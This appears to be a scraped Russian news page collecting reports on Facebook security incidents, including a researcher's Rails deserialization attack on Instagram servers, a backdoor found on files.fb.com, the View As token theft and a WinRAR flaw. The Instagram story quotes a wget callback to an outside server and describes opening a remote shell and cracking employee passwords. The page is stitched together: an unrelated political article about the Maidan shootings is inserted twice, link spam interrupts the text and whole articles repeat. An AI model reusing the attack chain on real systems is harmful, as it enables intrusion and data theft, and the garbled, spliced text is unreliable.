Криптографическая уязвимость ROBOT угрожает безопасности Facebook


Оглавление (нажмите, чтобы открыть):

Правоохранителям удалось поймать первого хакера, использовавшего уязвимость в OpenSSL

Благодаря уязвимости в OpenSSL злоумышленник украл данные сотен налогоплательщиков

facebook.com/yurij.shubin Канадская полиция доложила о поимке хакера, взломавшего сервера налоговой службы Канады с помощью уязвимости в OpenSSL.

Смотрите также: Захарченко: Беркут не причастен к расстрелам на Майдане

Бывший министр внутренних дел Украины Виталий Захарченко отверг причастность спецподразделения милиции «Беркут» к стрельбе по людям на Майдане Независимости во время февральских событий в Киеве. Экс-министр внутренних дел Виталий Захарченко дал интервью российскому «Первому каналу». По его словам, стрельба по активистам и правоохранителям велась именно с того здания, которое находилось под контролем активистов Майдана. «То, что это были не сотрудники милиции, я уверен на 100%. На все мероприятия Беркут выходил без боевого табельного оружия.

19-летнему канадцу, укравшему данные о 900 налогоплательщиков, инкриминированы сразу несколько обвинений, среди которых «несанкционированный доступ» и «использование информации в преступных целях».

Канадец стал первым хакером, пойманным на использование уязвимости, которая признана самой большой угрозой за все время существования интернета. На данный момент, специалисты даже не рискуют предположить урон, который мог быть потенциально нанесен пользователям, лишь настоятельно советуя срочно сменить пароли.

Напомним, что уязвимость в OpenSSL угрожает миллионам Android-смартфонам.

Хакерская атака на Facebook: взломано около 50 миллионов аккаунтов

Facebook сообщает о хакерской атаке на социальную сеть. Неизвестные воспользовались уязвимостью в системе безопасности и взломали около 50 миллионов аккаунтов.

Как это произошло

Хакеры использовали уязвимость функции View As (Посмотреть как), позволяющей узнать, как выглядит ваша страница на экранах других пользователей. Ошибка появилась в июле прошлого года, когда вносили изменения в код загрузки видео.
С помощью функции View As хакеры украли маркеры доступа к аккаунту — инструменты, запоминающие логин и пароль и позволяющие пользователю не вводить их каждый раз при входе.

Что делать

В Facebook отчитались, что уязвимость уже устранили, а функцию View As на время отключили. Также сброшены маркеры тех самых 50 миллионов пользователей, а заодно и 40-ка миллионов, которые пользовались View As в последний год. В общей сложности это 90 миллионов. Этим людям не надо заново регистрироваться — просто еще раз ввести для входа свои логин и пароль.

« Этим людям придется снова войти в систему, чтобы снова получить доступ к своим аккаунтам. Мы также уведомим этих людей в сообщении в верхней части ленты новостей о том, что произошло, когда они войдут в систему » , — сообщил основатель Facebook Марк Цукерберг.

Каковы последствия

Facebook еще не отошел от скандала с Cambr >« прокол » становится « болезненным » . Этот раз не стал исключением: после сообщения о хакерской атаке акции Facebook на Нью-Йоркской бирже снизились на 2,71% — до 164,26 долларов. В результате Цукерберг потерял 2 миллиарда долларов всего за день.

Facebook угрожает специалисту по безопасности, взломавшему Instagram


Независимый специалист по безопасности Уэсли Вайнберг (Wesley Wineberg) подвергся серьёзному давлению со стороны компании Facebook. Она не заплатила за найденные уязвимости на сервере Instagram, да ещё угрожает судебным иском.

Уэсли обнаружил уязвимость в инфраструктуре Instagram, с помощью которой нашёл (и, возможно, скачал) практически всё ценное, что есть на серверах Instagram: исходный код последней версии, SSL-сертификаты и приватные ключи для Instagram.com, ключи для подписи куков аутентификации, учётные данные от почтового сервера и ключи для некоторых других продуктов, в том числе для подписи мобильных приложений под iOS и Android.

Вайнберг также получил доступ к аккаунтам сотрудников и их парольным хешам, некоторые из которых хакер взломал, и получил доступ к нескольким хранилищам (бакетам) Amazon S3 с пользовательскими фотографиями и другими приватными данными, которые вызывают подозрения в нарушении конфиденциальности пользователей со стороны Facebook.

Вся эта эпопея началась ещё в октябре с того, что коллега Вайнберга сообщил ему об открытом веб-сервере sensu.instagram.com , который работает на инстансе Amazon EC2 и крутит фреймворк для мониторинга Sensu. О баге с открытой админкой сервера в Facebook уже сообщили, но коллега намекнул, что заметил там баг с удалённым сбросом пароля в приложении Ruby on Rails (CVE-2013-3221), подробнее см. статью о способах атаки на Ruby on Rails.

Хакер предположил, что такую же уязвимость можно найти в другом коде Instagram. Он изучил их репозиторий на Github, но ничего такого не обнаружил. Но зато нашёл кое-что получше. В файле secret_token.rb на гитхабе был прошит секретный токен Rails. В статье по ссылке выше подробно описано, как с помощью такого токена не только сфабриковать сессионные куки, но и инициировать десериализацию сессионных куков в Rails, чтобы напрямую запустить удалённое исполнение кода.

Уэсли сконфигурировал локальный инстанс Rails и воспользовался эксплоитом, который лежит на гитхабе: rails-3.2.10-remote-code-execution.md, чтобы сгенерировать объект, который спрячет в куки.

Полученный объект он подписал секретным ключом от Sensu-Admin — и получил куки от Sensu-Admin. К радости исследователя, сервер принял куки, запустил десериализацию, подтвердил подпись и запустил на исполнение объект, спрятанный внутри.

Это была команда wget exfiltrated.com/test-instagram — и сервер sensu.instagram.com послушно обратился к хакерскому серверу, что явно указало на то, что эксплоит работает.

Имея на руках работающий RCE, хакер запустил удалённый шелл.

Получив полное подтверждение бага, 21 октября 2015 года Вайнберг сообщил о двух уязвимостях в Facebook, рассчитывая на вознаграждение. В своём блоге он вспоминает статью 2012 года в Bloomberg, где руководитель отдела безопасности Facebook рассказывает о своей программе вознаграждений за найденные уязвимости и говорит: «Если найдут баг на миллион долларов, мы выплатим его».

Чтобы доказать всю серьёзность бага, исследователь продолжил изучать содержимое сервера Instagram, в том числе скачал к себе локальную базу Postgres с информацией об аккаунтах 60 сотрудников и паролями, захешированными bcrypt. Такие хеши очень трудно подобрать: у хакера на компьютере брутфорс шёл со скоростью всего 250 попыток в секунду. На удивление, некоторые пароли оказались настолько лёгкими, что атака по словарю дала эффект уже через несколько минут.

  • Шесть паролей «changeme»
  • Три пароля совпадали с именем пользователя
  • Два пароля «password»
  • Один пароль «instagram»

Отойдя от шока, хакер выбрал один из паролей и залогинился в веб-интерфейс.

После этого он отправил в Facebook информацию о слабых пользовательских аккаунтах (22 октября).

Ожидая положенное вознаграждение от Facebook, специалист изучил содержимое конфигурационного файла /etc/sensu/config.json , там были ключевые пары от 82 контейнеров Amazon S3. Доступ был закрыт ко всем, кроме одного. Но в этом единственном контейнере он нашёл ещё одну ключевую пару, которая давала доступ ко всем 82-м остальным контейнерам.

Facebook оперативно отреагировал, спрятал сервер Sensu за файрвол и 16 ноября выплатил вознаграждение $2500 за первый из трёх багов. В то же время 28 октября Вайнберг получил письмо, где ему отказали в выплате вознаграждения за второй и третий баги, потому что уязвимость со слабыми пользовательскими аккаунтами «выходит за рамки действия программы вознаграждения за уязвимости».

Мастер Йода рекомендует:  Задачка пересекутся ли две заданные прямые, лежащие в одной плоскости

Разумеется, специалист немного обиделся. Получить всего $2500 за уязвимость с удалённым исполнением кода — это почти оскорбительно мало. Он опубликовал в своём блоге описание взлома и несколько почтовых писем из переписки с отделом безопасности Facebook.


После этого ситуация начала накаляться. Директор по безопасности Facebook Алекс Стамос позвонил директору компании Synack, с которой Вайнберг работает по контракту. Он сказал, что произошёл несанкционированный доступ к базе данных сотрудников Instagram и конфиденциальной информации пользователей. Эта информация должна быть немедленно удалена. Стамос сказал, что не хочет сообщать юристам об инциденте, но в случае необходимости процесс против Вайнберга будет запущен.

В ответ на сообщение в блоге специалиста по безопасности Алекс Стамос тоже опубликовал заявление, где назвал действия хакера «неавторизованными и неэтичными». Он также предположил, что Вайнберг недоволен низким размером вознаграждения — этим объясняется его поведение.

В то же время специалист подтвердил, что удалил все данные, полученные с сервера S3 и никому их не показывал. Он добавил, что на инстаграмовском хостинге могли остаться другие незакрытые уязвимости. Но похоже на то, что миллион долларов ему так и не заплатят.

Исследователь взломал FACEBOOK и обнаружил там чужой вредоносный СКРИПТ

Исследователь Оранж Цай (Orange Tsai), консультант DevCore, на досуге искал уязвимости в сервисах Facebook, желая поучаствовать в bug bounty программе компании. Однако вместо какой-нибудь XSS уязвимости, исследователь обнаружил бэкдор неизвестного злоумышленника, который собирал учетные данные сотрудников Facebook.

Еще в конце февраля 2020 года Цай решил поискать уязвимости в Facebook и начал с исследования бэкэнда компании. Конечно, эти сервисы не принимают участия в программе вознаграждений за уязвимости, но они могли помочь исследователю в дальнейших изысканиях. Используя reverse whois, Цай сумел обнаружить домен files.fb.com, который используется сотрудниками социальной сети как хостинг для файлов и работает под управлением Accellion Secure File Transfer (FTA).

Идентифицировав ПО и его версию, Цай принялся за работу и в итоге обнаружил целый букет проблем: три XSS уязвимости; два бага допускающие локальное повышение привилегий; давно известную проблему с секретным ключом, которая может привести к удаленному исполнению кода; и pre-auth SQL-инъекцию, которая тоже позволяла удаленно выполнить произвольный код.

Последним багом в FTA исследователь воспользовался сам и, осуществив инъекцию, был вознагражден доступом к серверу Facebook и полным контролем над машиной. В принципе, Цай достиг своей цели – нашел проблему, так что он принялся собирать данные для отправки отчета в Facebook. Однако просматривая логи сервера, исследователь заметил нечто подозрительное.

Уже понимая, что в систему проник хакер, Цай изучил логи более внимательно, и сумел установить, что злоумышленник неоднократно возвращался. Хакер заходил на сервер, чтобы забрать собранные данные, изучить получше локальную сеть и даже попытался похитить приватный ключ SSL. Пики его активности пришлись на июль и середину сентября 2015 года.

Всю собранную информацию Цай передал в службу безопасности Facebook, уведомив компанию о происходящем. Исследователь сообщает, что теперь социальная сеть проводит собственное расследование инцидента, а его самого вознаградили за труды призом в размере $10 000.

5 азов кибербезопасности: как защитить себя от хакерских атак

Для хакеров представляют ценность не только аккаунты в социальных сетях и реквизиты банковских карт, но даже фотографии либо аудиозаписи в памяти устройства. С помощью ворованных учетных записей преступники рассылают спам или использовать их в мошеннических схемах. Кража финансовых данных может помочь злоумышленникам получить непосредственный доступ к вашим счетам. А личные фотографии — неплохой инструмент шантажа. Также известны случаи вымогательства денежных средств под угрозой гораздо больших штрафов за просмотр пиратских фильмов и прослушивание незаконно скачанной музыки. Существует пять простых правил, радикально повышающих безопасность каждого пользователя современных гаджетов.

Будьте осторожны при выборе сети

Беспроводные локальные сети могут быть настоящим рассадником вирусов и ловушек для ваших личных данных

Использование публичных Wi-Fi сетей является серьезным риском. Для обеспечения максимальной совместимости со всеми возможными устройствами, такие хот-споты, зачастую, используют не самое продвинутое шифрование. Взлом ключа общедоступной Wi-Fi сети и перехват внутри нее трафика не является архисложной задачей, тем более что существуют полностью автоматические программные решения для этого. Также никогда нельзя подключаться к незащищенной сети.

Наши смартфоны постоянно обращаются к серверам социальных сетей, мессенджеров и электронной почты. Чаще всего эти соединения зашифрованы, однако используя ряд хитростей и уязвимостей можно выделить из общего потока пакетов нужные и декодировать их. Помимо этого, злоумышленники разработали множество механизмов подмены сетевых адресов — приложение на телефоне будет думать, что обращается на требуемый сервер и отправит учетные данные.

  • Перед подключением к Wi-Fi сети в каком-либо заведении, не выбирайте ее наугад, обратитесь к сотрудникам и уточните имя (SSID). Мошенники могут разместить фальшивую сеть, которая похожа или вовсе имеет идентичное название.
  • Лучше отключить поиск Wi-Fi сетей в фоновом режиме, а также все возможные сервисы обмена известными сетями с другими устройствами. Существуют способы узнать, какие точки доступа ищет ваш телефон и «подсунуть» ему требуемые.
  • Идеальным вариантов будет установить VPN-клиент и подключиться либо к собственному серверу, либо к надежному платному. В этом случае вообще все соединения с вашего устройства будут идти по зашифрованному туннелю и перехватить их будет невозможно. Бесплатными VPN-сервисами пользоваться менее безопасно, так как чаще всего они зарабатывают на анализе трафика для рекламодателей.


Пароль должен быть надежным

Взломав один ваш аккаунт, злоумышленники попробуют все остальные, какие только смогут найти. И уже подобранный пароль они попробуют ввести в них в первую очередь.

Простой пароль, да еще и одинаковый для нескольких аккаунтов — просто мечта для любого киберпреступника. К сожалению, статистика показывает, что из года в год ситуация не улучшается и люди, прекрасно понимая все риски, продолжают использовать «QWERTY» или «ЙЦУКЕН». В большинстве случаев, мошенникам даже не приходится прибегать к сложным алгоритмам подбора: достаточно перебрать словарь типовых паролей. Придумывая учетные данные для своего аккаунта, стоит придерживаться следующих критериев:

  • Длина — не менее 10 символов, лучше больше 12
  • Состав — прописные и строчные буквы, цифры, специальные символы
  • Срок — лучше менять пароль не реже чем раз в квартал

Надежный пароль необязательно сложен в запоминании. Это может быть акроним, хитрая фраза, понятная только вам или даже слово на выдуманном языке. Избежать использования одинаковых паролей для различных учетных записей практически невозможно — уж слишком большое их количество появилось сейчас у каждого. Однако всегда можно хотя бы разбить пароли по группам: несколько ключей, каждый на свою группу сайтов, электронных почтовых ящиков или социальных сетей. Если вы боитесь забыть пароль и больше никогда не войти в учетную запись, просто внесите несколько резервных контактов. Большинство ресурсов позволяют это сделать и впоследствии восстановить доступ при необходимости.

Существуют бесплатные и надежные программные решения для хранения базы паролей. Такие приложения позволяют помнить только один набор учетных данных, а все остальные вводить автоматически. Также отличной идеей будет использовать двухфакторную авторизацию — когда подтверждение входа в учетную запись осуществляется с помощью одноразового кода. Сервис может присылать его в СМС, на электронную почту или в виде Push-уведомления на экране смартфона. Многие социальные сети, сайты и мессенджеры позволяют отслеживать все активные сессии, а также сообщают, если произошел вход в аккаунт. Проверьте, поддерживает ли ваше любимое приложение такой функционал.

Не переходите по незнакомым ссылкам

Многие современные браузеры имеют встроенные механизмы борьбы с фишингом (подменой веб-страниц)

Любопытство — не порок, но способно навредить. Новое письмо или сообщение в мессенджере, сопровождающееся интригующим текстом? Заманчивый диалог с привлекательным человеком, заканчивающийся предложением перейти в «более приятное место в сети»? А как насчет посмотреть девятый сезон «Игры престолов» онлайн, бесплатно, без регистрации и СМС? Лучше не делать этого, правда. Такие ссылки могут вести на сайт с вредоносным кодом, который атакует уязвимости в браузере. Или загрузит на устройство файл, который тоже захочется посмотреть, а в итоге получить «трояна».

Мастер Йода рекомендует:  Кросспостинг или как обогнать ближайших конкурентов

Мошенники ловко подделывают электронные письма от банков, социальных сетей и государственных учреждений. Если не изучать такие документы внимательно, легко ошибиться. Ссылки, содержащиеся в подобных письмах, ведут к тому же — кража личных данных, заражение устройства или интеграция в ботнет. Последнее означает, что ваш компьютер или смартфон превратится в скрытого «зомби» и через него будет проходить поток информации, необходимой злоумышленникам для атаки на другие их цели.

Всегда стоит проверять, что именно написано в адресной строке браузера. Если в слове заменить всего одну букву, наш мозг при беглом взгляде не заметит ничего подозрительного. GoogIe.com вместо Google.com будет не только хуже искать информацию в сети, но и попробует своровать ваши данные. Джекпотом для мошенников станет ваша попытка войти в свою учетную запись на таком «липовом» сайте. Чаще всего киберпреступники подделывают веб-страницы банков и социальных сетей.

Будьте бдительны и осторожны в интернете

Люди добровольно сообщают о себе массу личной информации, которая может быть использована против них же


Как следует из предыдущего пункта, внимательность способна спасти от множества проблем. Не стоит бездумно доверять красиво и профессионально выглядящим сайтам свои персональные данные. Даже если формально ресурс не является мошенническим, он может на абсолютно законных основаниях передавать информацию о вас третьим лицам. Изучите пользовательское соглашение, договор оферты на предоставляемые услуги, а также все данные о юридическом лице, которое владеет веб-страницей. Если этих документов на сайте нет либо в них содержится информация о том, что ваши данные будут использованы в коммерческих целях, лучше уйти с этого ресурса. Предоставив такому сервису сведения о себе, вы, в лучшем случае, подпишетесь на рекламную рассылку или получите навязчивые звонки на телефон, а в худшем — даже можете потерять деньги.

Не размещайте в социальных сетях какую-либо подробную информацию о себе. Даже публикуя фотографии в открытом профиле Instagram можно ненароком сообщить злоумышленникам ценные данные. Это может быть не только финансовое положение, но и увлечения, история передвижений или социальные связи. В дальнейшем на основании этих сведений существует возможность построить схему для кражи паролей, денег и аккаунтов. Самая прибыльная и эффективная стратегия кибератак — социальная инженерия, а все сведения о человеке — ее ресурс. Большая часть взломов происходит не с помощью программных ошибок или подбора паролей, а за счет использования психологических особенностей людей, обладающих доступом к целевым данным.

Всегда используйте последние версии программного обеспечения

Устаревшая «прошивка» смартфона — первый гвоздь в крышку гроба безопасности личных данных

Современные программы невероятно сложны и постоянно совершенствуются. В приложениях постоянно обнаруживаются потенциальные уязвимости и ошибки, а задача разработчиков — оперативно их исправлять. В свою очередь, хакеры непрерывно ищут узкие места в программном обеспечении и создают механизмы атаки на них. С каждым новым обновлением наши любимые мессенджеры, социальные сети и банковские клиенты становятся не только функциональнее, но и безопаснее.

Регулярное обновление ПО — залог сохранности ваших персональных данных и финансов. Даже риск ухудшения работоспособности или неприятного изменения дизайна не стоит «угнанного» аккаунта в соцсети либо потери всех средств на счете. Аналогично работают и создатели операционных систем. Например, чтобы проверить актуальность подсистемы безопасности ОС Android, нужно зайти в настройки и найти пункт «О телефоне» или аналогичный. В нем должен быть подпункт «версии ПО», где присутствует строка вида «патч безопасности». Если он старше трех месяцев — стоит проверить обновления системы или обратиться к производителю. В крайнем случае, подобное устаревание операционной системы является серьезным поводом заменить гаджет, особенно когда он является основным телефоном и на нем установлены банковские приложения.

Уязвимость WinRAR потенциально угрожает безопасности криптовалютных кошельков

В попурярном архиваторе WinRAR существует уязвимость, которая угрожает безопасности криптовалютных кошельков. Примечательно, что ошибка, которая позволяла вставлять исполняемый код в систему после открытия rar-файла, по-видимому, существует уже в течение 14 лет, но обнаружилась только недавно. Теперь, когда это общеизвестно, вполне вероятно, что для непропатченых систем будут написаны эксплойты.

Обновление WinRAR до последней версии ( из официального источника ) исправляет проблему. Но WinRAR — это одна из самых распространенных программ, которая насчитывает около 500 миллионов пользователей. В сабреддите Bitcoin один из пользователей пишет:

Вот как это работает. Вы открываете зловредный rar-файл непропатченой версией Winrar, и полезная нагрузка помещается в папку автозагрузки Windows. Это означает, что при перезагрузке вы загрузите exe. И знаете что? Никто никогда не обновляет Winrar… Таким образом, вероятно, есть по крайней мере 100 миллионов компьютеров с непропатченой версией Winrar.

Разрешение выполнения кода означает, что что-то, предназначенное для кражи средств с биткоин-кошельков, может довольно легко распространиться в системе. В связи с этим не рекомендуется устанавливать программное обеспечение биткоина на компьютеры общего назначения. Если это так, антивирусное программное обеспечение является обязательным. В конце концов, всё зависит от того, чем вы готовы рискнуть.

Эта ошибка является результатом использования библиотеки WinRAR для обработки файлов ACE. Разработчики WinRAR решили больше не поддерживать файлы ACE:

WinRAR всегда был известен широкой поддержкой всех популярных форматов сжатия. Поскольку UNACEV2.DLL не обновлялся с 2005 года, а доступ к его исходному коду недоступен, было принято решение отказаться от поддержки архивов ACE, начиная с WinRAR 5.70. Теперь, после выпуска стабильной версии WinRAR 5.70, настоятельно рекомендуется перейти на новую версию 5.70.

Правоохранителям удалось поймать первого хакера, использовавшего уязвимость в OpenSSL

Благодаря уязвимости в OpenSSL злоумышленник украл данные сотен налогоплательщиков

facebook.com/yurij.shubin Канадская полиция доложила о поимке хакера, взломавшего сервера налоговой службы Канады с помощью уязвимости в OpenSSL.

Смотрите также: Захарченко: Беркут не причастен к расстрелам на Майдане

Бывший министр внутренних дел Украины Виталий Захарченко отверг причастность спецподразделения милиции «Беркут» к стрельбе по людям на Майдане Независимости во время февральских событий в Киеве. Экс-министр внутренних дел Виталий Захарченко дал интервью российскому «Первому каналу». По его словам, стрельба по активистам и правоохранителям велась именно с того здания, которое находилось под контролем активистов Майдана. «То, что это были не сотрудники милиции, я уверен на 100%. На все мероприятия Беркут выходил без боевого табельного оружия.


19-летнему канадцу, укравшему данные о 900 налогоплательщиков, инкриминированы сразу несколько обвинений, среди которых «несанкционированный доступ» и «использование информации в преступных целях».

Канадец стал первым хакером, пойманным на использование уязвимости, которая признана самой большой угрозой за все время существования интернета. На данный момент, специалисты даже не рискуют предположить урон, который мог быть потенциально нанесен пользователям, лишь настоятельно советуя срочно сменить пароли.

Напомним, что уязвимость в OpenSSL угрожает миллионам Android-смартфонам.

Информационный портал по безопасности

Facebook угрожает специалисту по безопасности, взломавшему Instagram

Независимый специалист по безопасности Уэсли Вайнберг (Wesley Wineberg) подвергся серьёзному давлению со стороны компании Facebook. Она не заплатила за найденные уязвимости на сервере Instagram, да ещё угрожает судебным иском.

Уэсли нашёл уязвимость в инфраструктуре Instagram, с помощью которой скачал практически всё ценное, что есть на серверах Instagram: исходный код последней версии, SSL-сертификаты и приватные ключи для Instagram.com, ключи для подписи куков аутентификации, учётные данные от почтового сервера и ключи для некоторых других продуктов, в том числе для подписи мобильных приложений под iOS и Android.

Вайнберг также получил доступ к аккаунтам сотрудников и их парольным хешам, некоторые из которых хакер взломал, и получил доступ к нескольким хранилищам (бакетам) Amazon S3 с пользовательскими фотографиями и другими приватными данными, которые вызывают подозрения в нарушении конфиденциальности пользователей со стороны Facebook.

Мастер Йода рекомендует:  Как создать FAQ-страницу, используя два цикла WordPress

Вся эта эпопея началась ещё в октябре с того, что коллега Вайнберга сообщил ему об открытом веб-сервере https://sensu.instagram.com , который работает на инстансе Amazon EC2 и крутит фреймворк для мониторинга Sensu. О баге с открытой админкой сервера в Facebook уже сообщили, но коллега намекнул, что заметил там баг с удалённым сбросом пароля в приложении Ruby on Rails ( CVE-2013-3221 ), подробнее см. статью о способах атаки на Ruby on Rails .

Хакер предположил, что такую же уязвимость можно найти в другом коде Instagram. Он изучил их репозиторий на Github, но ничего такого не обнаружил. Но зато нашёл кое-что получше. В файле secret_token.rb на гитхабе был прошит секретный токен Rails. В статье по ссылке выше подробно описано, как с помощью такого токена не только сфабриковать сессионные куки, но и инициировать десериализацию сессионных куков в Rails, чтобы напрямую запустить удалённое исполнение кода.

Уэсли сконфигурировал локальный инстанс Rails и воспользовался эксплоитом, который лежит на гитхабе: rails-3.2.10-remote-code-execution.md , чтобы сгенерировать объект, который спрячет в куки.

Полученный объект он подписал секретным ключом от Sensu-Admin — и получил куки от Sensu-Admin. К радости исследователя, сервер принял куки, запустил десериализацию, подтвердил подпись и запустил на исполнение объект, спрятанный внутри.

Это была команда wget https://exfiltrated.com/test-instagram — и сервер sensu.instagram.com послушно обратился к хакерскому серверу, что явно указало на то, что эксплоит работает.

Имея на руках работающий RCE, хакер запустил удалённый шелл.

Получив полное подтверждение бага, 21 октября 2015 года Вайнберг сообщил о двух уязвимостях в Facebook, рассчитывая на вознаграждение. В своём блоге он вспоминает статью 2012 года в Bloomberg, где руководитель отдела безопасности Facebook рассказывает о своей программе вознаграждений за найденные уязвимости и говорит: «Если найдут баг на миллион долларов, мы выплатим его».

Чтобы доказать всю серьёзность бага, исследователь продолжил изучать содержимое сервера Instagram, в том числе скачал к себе локальную базу Postgres с информацией об аккаунтах 60 сотрудников и паролями, захешированными bcrypt. Такие хеши очень трудно подобрать: у хакера на компьютере брутфорс шёл со скоростью всего 250 попыток в секунду. На удивление, некоторые пароли оказались настолько лёгкими, что атака по словарю дала эффект уже через несколько минут.

  • Шесть паролей «changeme»
  • Три пароля совпадали с именем пользователя
  • Два пароля «password»
  • Один пароль «instagram»



Отойдя от шока, хакер выбрал один из паролей и залогинился в веб-интерфейс.

После этого он отправил в Facebook информацию о слабых пользовательских аккаунтах (22 октября).

Ожидая положенное вознаграждение от Facebook, специалист изучил содержимое конфигурационного файла /etc/sensu/config.json , там были ключевые пары от 82 контейнеров Amazon S3. Доступ был закрыт ко всем, кроме одного. Но в этом единственном контейнере он нашёл ещё одну ключевую пару, которая давала доступ ко всем 82-м остальным контейнерам.

Facebook оперативно отреагировал, спрятал сервер Sensu за файрвол и 16 ноября выплатил вознаграждение $2500 за первый из трёх багов. В то же время 28 октября Вайнберг получил письмо, где ему отказали в выплате вознаграждения за второй и третий баги, потому что уязвимость со слабыми пользовательскими аккаунтами «выходит за рамки действия программы вознаграждения за уязвимости».

Разумеется, специалист немного обиделся. Получить всего $2500 за уязвимость с удалённым исполнением кода — это почти оскорбительно мало. Он опубликовал в своём блоге описание взлома и несколько почтовых писем из переписки с отделом безопасности Facebook.

После этого ситуация начала накаляться. Директор по безопасности Facebook Алекс Стамос позвонил директору компании Synack, с которой Вайнберг работает по контракту. Он сказал, что произошёл несанкционированный доступ к базе данных сотрудников Instagram и конфиденциальной информации пользователей. Эта информация должна быть немедленно удалена. Стамос сказал, что не хочет сообщать юристам об инциденте, но в случае необходимости процесс против Вайнберга будет запущен.

В ответ на сообщение в блоге специалиста по безопасности Алекс Стамос тоже опубликовал заявление , где назвал действия хакера «неавторизованными и неэтичными». Он также предположил, что Вайнберг недоволен низким размером вознаграждения — этим объясняется его поведение.

В то же время специалист подтвердил, что удалил все данные, полученные с сервера S3 и никому их не показывал. Он добавил, что на инстаграмовском хостинге могли остаться другие незакрытые уязвимости. Но похоже на то, что миллион долларов ему так и не заплатят.

Хакерская атака на Facebook: взломано около 50 миллионов аккаунтов

Facebook сообщает о хакерской атаке на социальную сеть. Неизвестные воспользовались уязвимостью в системе безопасности и взломали около 50 миллионов аккаунтов.

Как это произошло

Хакеры использовали уязвимость функции View As (Посмотреть как), позволяющей узнать, как выглядит ваша страница на экранах других пользователей. Ошибка появилась в июле прошлого года, когда вносили изменения в код загрузки видео.
С помощью функции View As хакеры украли маркеры доступа к аккаунту — инструменты, запоминающие логин и пароль и позволяющие пользователю не вводить их каждый раз при входе.

Что делать

В Facebook отчитались, что уязвимость уже устранили, а функцию View As на время отключили. Также сброшены маркеры тех самых 50 миллионов пользователей, а заодно и 40-ка миллионов, которые пользовались View As в последний год. В общей сложности это 90 миллионов. Этим людям не надо заново регистрироваться — просто еще раз ввести для входа свои логин и пароль.

« Этим людям придется снова войти в систему, чтобы снова получить доступ к своим аккаунтам. Мы также уведомим этих людей в сообщении в верхней части ленты новостей о том, что произошло, когда они войдут в систему » , — сообщил основатель Facebook Марк Цукерберг.

Каковы последствия

Facebook еще не отошел от скандала с Cambr >« прокол » становится « болезненным » . Этот раз не стал исключением: после сообщения о хакерской атаке акции Facebook на Нью-Йоркской бирже снизились на 2,71% — до 164,26 долларов. В результате Цукерберг потерял 2 миллиарда долларов всего за день.

Хакер взломал страницу Марка Цукерберга в Facebook

Хакер из Палестины обнаружил уязвимость в Facebook, позволяющую размещать записи на стене любого пользователя, даже если он не находится в списке «друзей». После того, как техподдержка Facebook не восприняла всерьез его сообщение, ему пришлось продемонстрировать баг на примере личной страницы Марка Цукерберга.

Обнаруженная палестинским компьютерщиком по имени Халил Шратех уязвимость — это своего рода «мечта спамера», за такую возможность распространители непрошеной рекламы готовы были бы отдать миллионы. Он связался с отделом безопасности Facebook и предоставил доказательства существования «дыры». Тем не менее, ему то ли не поверили, то ли просто не захотели платить обещанные всем, находящим реальные баги, «призовые» деньги (от 500 долларов за баг и выше). «Это не баг», — ответил палестинцу в письме специалист техподдержки Facebook, видимо, не совсем разобравший хромающий английский ближневосточного компьютерщика.

Свою переписку с Facebook Шратех подробно описывает в блоге. Поскольку общение с подчиненными Марка Цукерберга ни к чему не привело, хакер решил попробовать достучаться до основателя и гендиректора Facebook напрямую, разместив сообщение об уязвимости прямо на его «стене», записи на которой могут по идее размещать только «друзья»:

После этого отдел безопасности Facebook все же отреагировал, специалисты вникли в детали и уже устранили уязвимость. Детали приводятся в посте на форуме Hacker News. Однако денег за обнаруженную «дыру» палестинцу не достанется, поскольку демонстрация уязвимостей на реальных аккаунтах без согласия их владельцев является нарушением условий программы поощрения «добросовестных» хакеров. По ней, кстати, соцсеть выплатила в сумме уже более миллиона долларов.

Добавить комментарий